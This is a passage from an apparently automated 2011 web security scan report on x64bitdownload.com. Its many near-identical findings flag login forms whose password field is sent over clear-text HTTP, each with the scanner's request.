User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.80. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.81. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.82. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.83. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.84. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.85. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.86. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.87. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.88. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /a-oz-insight-1768-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.89. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.90. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.91. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.92. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.93. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.94. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.95. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.96. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.97. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.98. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.99. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.100. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.101. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.102. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.103. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.104. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.105. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.106. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.107. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.108. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.109. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.110. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.111. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.112. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.113. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.114. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.115. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.116. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /contact.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.117. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.118. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.119. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.120. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.121. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.122. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
